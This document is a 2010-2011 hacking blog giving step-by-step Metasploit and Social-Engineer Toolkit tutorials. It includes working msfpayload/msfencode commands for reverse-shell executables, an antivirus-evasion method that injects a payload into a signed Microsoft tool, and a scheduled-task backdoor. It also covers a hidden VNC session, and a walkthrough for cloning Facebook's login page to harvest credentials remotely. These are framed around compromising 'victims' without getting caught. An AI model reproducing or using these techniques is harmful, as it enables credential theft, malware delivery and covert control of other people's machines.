Security Exploiter

NEED YOU!

2011-06-04T10:19:00.000-07:00

Hi all,

First off thanks for your support over YouTube I am grateful.

Ok so i have been busy with creating a new site as blogger is a bit basic and i am also going to be running a forum but this will be allot of work for me, so I am looking for anyone with good knowledge of backtrack, forum administration and so on to assist me in creating a good service .....i have some big plans and this is an opportunity to come and join me and make something great..........Im looking props for a team of 5 ultimately but will start off with just a few.

If you wish to talk to me about it feel free to do so.
contact me over youtube or on here

Thanks

Slayer231091

Backtrack 5 is going be here in 2 DAYS!!!! 10th May!!

2011-05-08T07:21:00.001-07:00

OK im sure alot of you know that the knew Backtrack 5 will be coming out in 2days, and i am so excited!.

BackTrack 5 - Penetration Testing Distribution from Offensive Security on Vimeo.

Its been totally redone with loads of added features, These are some of the main points:

Our release will start on May 10th (don’t bug us about the timezone), and will primarily be available for download via torrents. This is to reduce the massive load on our mirrors for the first few hours.
As time progresses into the release , we will then allow direct downloads from our mirrors.
We will have KDE (4.6) and Gnome (2.6) Desktop environment flavours
32 and 64 bit support
A basic ARM BackTrack image which can be chrooted into from android enabled devices. (hopefully released May 10th)
The 32 and 64 bit images support “Forensics Mode”, which boots a forensically sound instance of BackTrack and “Stealth mode”, which boots without generating network traffic.
All support for Backtrack 4 will end on May 10th, 2011 and BackTrack 4 will not be available for download from our official mirrors from that date onwards.
And yes, Metasploit 3.7.0 *was* packaged into BT5.

I have been waiting for this and have a load of videos to make on it, i have been not making any as i wanted to show them on backtrack 5 so a small list of things ill be bringing out is:

-Put backtrack behind a proxy using tor, privoxy, proxychains - making you Anonymous weather it be surfing the net to Nmap scans or even when using metaploit and various programs!

-Cracking Wireless networks, with a follow on on how to compromise a system after you have cracked the wireless.

-Setting up a SSH Tunnel on the remote (victims) machine through metasploit meterpreter ( this is a cleaver little Technique to use as u can have full full full control over victim and not get caught.) Also after i manually did it by hand i did a bit of digging as i couldnt see why know one had thought about it before and i only found one small article about doing exactly what i did but in this article the guy has created a Meterpreter .rb file so it automates the manual procedure of installing the SSH, but i shall show you how to do both!

-Possibly make a vid on how to install the new Backtrack 5 not sure yet tho.

Thats just a few things i have lined up ready for you guys!

Sorry to keep you guys waiting for new vids but I wanted to show you it on backtrack 5 just in case its changed alot!

AVG Internet Security - Firewall Test! Quick Nmap Scan

2010-12-23T03:49:00.000-08:00

Hi all this is just a short post .......... To help keep yourselves protected better I recommend AVG 2011 full. In the video I show one reason why you should.....its has an amazing firewall. As demonstrated in the video. I will be making more videos about how AVG is great later on :) enjoy!!

How To: Remote Harvest Credentials (no-ip) e.g. Facebook Account Hack

2010-12-15T12:29:00.000-08:00

In this post I will first go over whats in the video then I will show you how to edit the config file for SET
BTW in this vid im running ubuntu 10.10 with macbuntu installed

To do this attack online instead of on the local subnet which I showed you last you will need to use a DNS service in the video I use no-ip.com. Just make an account and assign a host name to your ip. this will act as a website URL to your ip with you webserver running on.

In the video I mention something that is different to the setup of the server from the last video and that is the fact I had to enter my ip address this is because I have edited the config file to suit my other preferences and options avalible in the SET script. Which im now about to move onto. For the next load of text I have been lazy and have used the site http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET) which is the people who made SET. I have just cut some of the relevance stuff out and pasted to this page. But I would encourage a read of the link as it gives a good understanding of how each attack vectors and options work which I wont cover in this post.

Now to edit the config file which is locate at
----------------------------------------------
root@bt:/pentest/exploits/SET/config# ls
mailing_list.txt set_config set_config.save
----------------------------------------------
To edit the set_config type " nano set_config" or replace nano with you preferred text editor nano is mine.
Now for the copy and past :)
----------------------------------------------

Beginning with the Social Engineer Toolkit

The brains behind SET is its configuration file. SET by default works perfect for most people however, advanced customization may be needed in order to ensure that the attack vectors go off without a hitch. First thing to do is ensure that you have updated SET, from the directory:

root@bt:/pentest/exploits/SET# svn update
U    src/payloadgen/payloadgen.py
U    src/java_applet/Java.java
U    src/java_applet/jar_file.py
U    src/web_clone/cloner.py
U    src/msf_attacks/create_payload.py
U    src/harvester/scraper.py
U    src/html/clientside/gen_payload.py
U    src/html/web_server.py
U    src/arp_cache/arp_cache.py
U    set
U    readme/CHANGES
Updated to revision 319.
root@bt:/pentest/exploits/SET#

Once you’ve updated to the latest version, start tweaking your attack by editing the SET configuration file. Let’s walk through each of the flags:

root@bt:/pentest/exploits/set# nano config/set_config

# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3

Looking through the configuration options, you can change specific fields to get a desired result. In the first option, you can change the path of where the location of Metasploit is. Metasploit is used for the payload creations, file format bugs, and for the browser exploit sections.

# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap

The Ettercap section can be used when you’re on the same subnet as the victims and you want to perform DNS poison attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site or all sites to your malicious server running.

# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF

Setting the SENDMAIL flag to ON will try starting SENDMAIL, which can spoof source email addresses. This attack only works if the victim’s SMTP server does not perform reverse lookups on the hostname. SENDMAIL must be installed. If your using BackTrack 4, it is installed by default.

# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
WEBATTACK_EMAIL=OFF

When setting the WEBATTACK_EMAIL to ON, it will allow you to send mass emails to the victim while utilizing the Web Attack vector. Traditionally the emailing aspect is only available through the spear-phishing menu however when this is enabled it will add additional functionality for you to be able to email victims with links to help better your attacks.

# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
# INSTALL --->  JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF

The Java Applet Attack vector is the attack with one of the highest rates of success that SET has in its arsenal. To make the attack look more believable, you can turn this flag on which will allow you to sign the Java Applet with whatever name you want. Say your targeting CompanyX, the standard Java Applet is signed by Microsoft, you can sign the applet with CompanyX to make it look more believable. This will require you to install java’s jdk (in Ubuntu its apt-get install sun-java6-jdk or openjdk-6-jdk).

# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON

The AUTO_DETECT flag is probably one of the most asked questions in SET. In most cases, SET will grab the interface you use in order to connect out to the Internet and use that as the reverse connection and IP address. Most attacks need to be customized and may not be on the internal network. If you turn this flag to OFF, SET will prompt you with additional questions on setting up the attack. This flag should be used when you want to use multiple interfaces, have an external IP, or you’re in a NAT/Port forwarding scenario.

# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK
# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.
WEB_PORT=80

By default the SET web server listens on port 80, if for some reason you need to change this, you can specify an alternative port.

# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV
# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE
# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
CUSTOM_EXE=src/exe/legit.binary

When using the payload encoding options of SET, the best option for Anti-Virus bypass is the backdoored, or loaded with a malicious payload hidden in the exe, executable option. Specifically an exe is backdoored with a Metasploit based payload and can generally evade most AV’s out there. SET has an executable built into it for the backdooring of the exe however if for some reason you want to use a different executable, you can specify the path to that exe with the CUSTOM_EXE flag.

# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www

The web server utilized within SET is a custom-coded web server that at times can be somewhat slow based off of the needs. If you find that you need a boost and want to utilize Apache, you can flip this switch to ON and it will use Apache to handle the web requests and speed your attack up. Note that this attack only works with the Java Applet and Metasploit based attacks. Based on the interception of credentials, Apache cannot be used with the web jacking, tabnabbing, or credential harvester attack methods.

# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
#
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
#
SELF_SIGNED_CERT=OFF
#
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem

In some cases when your performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well however there will be an “untrusted” warning when a victim goes to your website.

TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW
# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
WEBJACKING_TIME=2000

The webjacking attack is performed by replacing the victim’s browser with another window that is made to look and appear to be a legitimate site. This attack is very dependant on timing, if your doing it over the Internet, I recommend the delay to be 5000 (5 seconds) otherwise if your internal, 2000 (2 seconds) is probably a safe bet.

How To: Harvest Credentials e.g. Facebook Account Hacked !

2010-12-15T11:53:00.000-08:00

What is SET:

"The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test."

In the video I walk you through the selections to make to create your fake site ready for your victim.
Without changing the config file the server will run locally on you internal ip for example 192.168.X.X. To get it working on you remote ip you will have to edit your config file which I shall post in my next as it isnt relevant here (my next post is gonna be written straight after this!)
For the Credential Harvester to be successful then you need to clone a site with a username and password login fields e.g. Facebook.
Not much more to say than, the victim connects to the site thinks its lagit logs in and you get the credentials ......the fake site is made to redirect the victim to the proper site after they think they have logged in.

To do this on a local network on the subnet you can use ettercap.dns spoof to spoof your victims into goin to you site. this can be done in the config file and or the ettercap gui/commandline. (edit the config file will be in my next post) DNS spoofing will come soon.
My next post will be about doing this remotely using a DNS service like no-ip.com and ill do a write up off editing the config file.
Any Questions give me a buzz :)

Hide Payload In Trusted EXE to Bypass AV's

2010-12-05T09:51:00.000-08:00

This is a video to show you how to hide the Metasploit Meterpreter payload in a trusted exe to help bypass antivirus detection.

Obviously this is useful and this method is very effective

In my demonstration I use the Microsoft Malicious Software Removal Tool (hehe the irony) This is good for the following reasons:
1.Has the Microsoft Signature (helps when trying to go undetected)
2.Asks the user to run in admin mode with the UAC giving use higher privs :)

To keep the payload undetected and hidden from AV's I recommend injecting it into a trusted exe. In the video I use the Microsoft's Software Removal Tool. The good thing about this exe is it works! not all exe's will work so you will have to do some testing. For example the payload might not execute correctly so u will have to test this your self. But the best thing is that the exe from Microsoft asks the user to run as admin which means on windows vista/7 you will be able to get higher privliges and be able to run commands like "schedueleme" shown in my Backdoor video.

./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT= R|./msfencode -c 5 -e x86/shikata_ga_nai -x /root/ -t exe > /root/

OK so what this code does is

(./msfpayload windows/meterpreter/reverse_tcp LHOST=***.***.***.*** LPORT=***.***.***.***)= the basic metasploit meterpreter payload config

(R)= creates the payload and keeps it RAW without encoding it into an exe for example

(|./msfencode)= pipes the RAW payload into the encode process.

(./msfencode -c 5 -e x86/shikata_ga_nai)= this encodes the payload 5 times with the x86/shikata_ga_nai encoder.

(-x /root/ -t exe > /root/name.exe)= send raw encoded payload and inject it into the trusted exe then with the new file call it name.exe

then execute on victim machine and bingo :)

What Video Tutorials Would You Like to See ?

2010-11-29T04:21:00.000-08:00

Just comment after this on what topics you would like me to cover.....

Look forward to some comments :)

HOW TO: Metasploit Meterpreter as a Backdoor

2010-11-28T05:21:00.000-08:00

This tutorial is for making a backdoor one the victims system which we can use to reconnect to them if we wish to.

For this we will be using the Scheduleme command but for this to work properly on windows vista and windows 7 the victim would have to open the exe as administrator. This is easy to ensure if you apply the correct social engineering.

The meterpreter session will run as the user id of the currect user. Then use the "use privs" command to get better privliages and more options then by typing "help" will list most of the avalible commands for you to use.

The "use privs" command might have been taken out in the new versions of metasploit instead i think it loads it automatically just try it out, and ill get back to you on this.

Using scheduleme command

running the below command will show you all the options avalible

>"run scheduleme -h"

The command i use is below

>"run scheduleme -m -1 -u -e /root/exploit.exe

Break down the command:

the -m options specifies how often the schedeld task will run so i did "-m -1" so every 1 mins it is started.

the -u starts the user name of the account with admin privs

the - e is the exe you want to upload to the victim which you want to use for you back door so mine is in root directory so -e /root/exploit.exe would be my option

Now its been uploaded exit meterpreter session and start the listener again and wait for a min for a connection ...watch video!

NOTE: The EXE which is uploaded must obviously configured to connect back to you and u create this exe just alike all the others.

How To Get a VNC Session Inside a Meterpreter Session While Still Having Access To The Meterpreter Command Line

2010-11-27T16:14:00.000-08:00

If you didn't no what VNC was then its remote control software which lets you see and interact with desktop applications across any network.

In metasploit there is a .rb script that allows you to control a remote computer like VNC and its located at /opt/metasploit3/msf3/scripts/meterpreter/ and called vnc.rb this script is all well and good but it just creates a VNC session and that's it. It doesnt give you the option to carry on using Meterpreter so I came accross a script which will allow you to still use meterpreter in the background which is useful when you still what to do background operations like uploading and downloading and edits to the registry etc..

In the video:

I explain how to create the script and use it.
You can download the script from HERE its in .txt format
Then using nano which is a console based text editor installed in backtrack I create the scripts into the /opt/metasploit3/msf3/scripts/meterpreter/ location and give them the file extension .rb which is a ruby file.

Watch Video If Unsure!!!.

But there is a problem with this script if you want to be more hidden. The script spawns a Command shell prompt on the victims screen in plane site. to get around this I modify the file to include this line:

mul.datastore['DisableCourtesyShell'] = true

Watch the video as to where to place it in the file.

To run the script from meterpreter just type "run <filename.rb>" then a vnc screen has been created and you can control the remote machine but also if you go back to you meterpreter session and hit enter a few times you will still have you command line with full access :)
This is a great book for learning the Metasploit framewaork!
Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research

Intro: Metasploit Meterpreter Reverse TCP Payload exe at First Glance

2010-11-27T06:30:00.000-08:00

In this video I show you how to make a basic reverse TCP payload in Metasploits Meterpreter Program.

A bit of info on The Metasploit Project:

"Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project."
http://www.metasploit.com/

This program is avalible for Windows and Linux (I tried using it on windows and hated it) and is updated about daily.
Its one of the best, free programs for pentesting/exploiting.

In the video i show you how to use the program in Linux if you use it in Windows the commands could be slightly different.

In the video:

I show you how to make a basic Reverse_tcp payload. Open the client and use this code " ./msfpayload windows/meterpreter/reverse_tcp LHOST=<your ip adddress> LPORT=<Your Listening Port> x > /root/<filename.exe>

Explanation:

LHOST is the address of which you what you exe to connect back on to you this can be internal or external ip. To find you internal ip in Linux just open terminal and type "ifconfig" and you shall see it.

LPORT is the port you what your exe to connect back to you on so make sure its forwarded properly.

the line " x > /root/<filename.exe> " is basically saying create an exe " x " and to send it to " > /root/filename.exe " which is your root folder on Linux. This file exe will only work for windows there are the same exploits for other OS but as windows is most common I will use this.

so an example would be this
" ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.66 LPORT=4444 x > /root/reverse_tcp.exe "

There are extra commands which will encode your exe as to help bypass AV (AntiVirus) but I will cover them on a later post as this is intended for the very basic, first glance look at it and how it works.

Next copy the exe you just created to the (victim BOX), if you havent noticed I use a Virtual Machine running Backtrack 4 and XP Pro.

So now we need to open a listener so we can listen for the exe connecting back so that we get a session.

Open Metasploit Console and type this:
"use multi/handler"
"set PAYLOAD windows/meterpreter/reverse_tcp"
"set LHOST 192.168.1.1"
"set LPORT 4444"
"exploit"

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...

So now we have a Listening server running, waiting for the connect back.
Remember to make LHOST and LPORT your own configuration.

When the exe is clicked and activated you should get the connection and look like this:

msf exploit(handler) > exploit
[*] Started reverse handler on port 4444
[*] Starting the payload handler...
[*] Sending stage (72346 bytes)
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060)
 
meterpreter >

Now we have a meterpreter session and have full access :)

New Security Blog!!

2010-11-27T04:23:00.000-08:00

Because of good amounts of interest on my YouTube videos I have decided to create a blog to help explain my videos which will help you the view. As well as just posting my videos here i will also be giving you extra security updates and tips.

This is also be a place where you can ask questions etc.... I will keep this blog updated regularly and I will respond as quick as possible.

Oh and please tell me what you think to the blog ..............if im missing anything or you want to suggest something that might improve it or something then please feel free.